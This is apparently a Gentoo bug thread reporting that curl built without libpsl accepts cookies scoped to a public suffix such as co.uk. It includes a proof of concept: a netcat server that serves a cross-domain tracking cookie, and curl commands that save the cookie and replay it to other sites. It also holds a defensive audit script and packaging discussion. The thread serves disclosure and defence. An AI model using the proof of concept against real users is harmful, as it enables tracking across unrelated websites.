A malicious website can set a super cookie if the victim requests the url. The cookie will be transmitted to other websites that are then queried. This requires curl to be compiled without libpsl support. It is recommended to build curl with libpsl support. libpsl support can be verified with curl --version. Gentoo by default does not have this included.

Proof of Concept
----------------

1. Use the below code to set up a malicious server in any curl version compiled without libpsl support.

```
echo -ne "HTTP/1.1 200 OK\r\nSet-Cookie: super_cookie=tracking_you_across_domains; domain=co.uk; \r\nContent-Length: 0\r\n"| nc -l 8000
```

2. Run the below command, and notice that cookies are saved to cookies.txt

```
curl yadhu.co.uk:8000 -c cookies.txt
```

Generated cookie file:

```
# Netscape HTTP Cookie File
# This file was generated by libcurl! Edit at your own risk.

.co.uk TRUE / FALSE 0 super_cookie tracking_you_across_domains
```

3. Use the same cookies.txt file to send requests to other `.co.uk` domains.

```
curl someoneelse.co.uk:8000 -b cookies.txt --verbose
```

Refer - daniel.haxx.se/blog/2024/01/10/psl-in-curl/
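A defender-side check for the condition reported above, as an added example that is not part of the original report or of curl or the Gentoo ebuild: it tests `curl --version` output for the PSL feature and scans a Netscape cookie jar for cookies scoped to a bare public suffix. The function names, the three-entry suffix list and the sample jar are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the bug report): audit a curl build and a cookie jar.

# Succeeds if the `curl --version` text on stdin lists PSL on its Features line.
# Real use: curl --version | has_psl || echo "curl built without libpsl"
has_psl() {
    grep '^Features:' | tr ' ' '\n' | grep -qx 'PSL'
}

# Prints "domain cookie-name" for jar entries whose domain is a bare public suffix.
# $1 = Netscape cookie jar, $2 = suffix file (one per line, "//" comments allowed).
# Assumption: exact-match rules only; PSL wildcard (*.) and exception (!) rules
# are not interpreted here.
supercookies() {
    awk '
        FILENAME == ARGV[1] { if ($0 != "" && $0 !~ /^\/\//) psl[tolower($1)] = 1; next }
        { sub(/^#HttpOnly_/, "") }          # HttpOnly entries carry this prefix
        /^#/ || NF < 6 { next }             # skip comments and short lines
        { d = tolower($1); sub(/^\./, "", d); if (d in psl) print d, $6 }
    ' "$2" "$1"
}

# Constructed sample data so the script runs offline.
demo() {
    tmp=$(mktemp -d) || return 1
    printf '%s\n' '// constructed subset of a suffix list' 'uk' 'co.uk' 'com' > "$tmp/psl"
    printf '# Netscape HTTP Cookie File\n' > "$tmp/jar"
    printf '%s\t%s\t%s\t%s\t%s\t%s\t%s\n' \
        .co.uk TRUE / FALSE 0 super_cookie tracking_you_across_domains \
        '#HttpOnly_.example.co.uk' TRUE / FALSE 0 session abc \
        shop.example.com FALSE / TRUE 0 cart 42 >> "$tmp/jar"
    supercookies "$tmp/jar" "$tmp/psl"
    rm -rf "$tmp"
}

demo
```

Against a real system, feed `supercookies` the jar under review and a copy of the public suffix list; any line it prints is a cookie that a PSL-enabled curl would have rejected.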
This USE flag is already default-on in the ebuild. However, based on the potential security problems of disabling it, maybe we should force it on in profiles and maybe give the user an ewarn (probably linking to Daniel's article) if disabled? What do we think?
Already reported. *** This bug has been marked as a duplicate of bug 919325 ***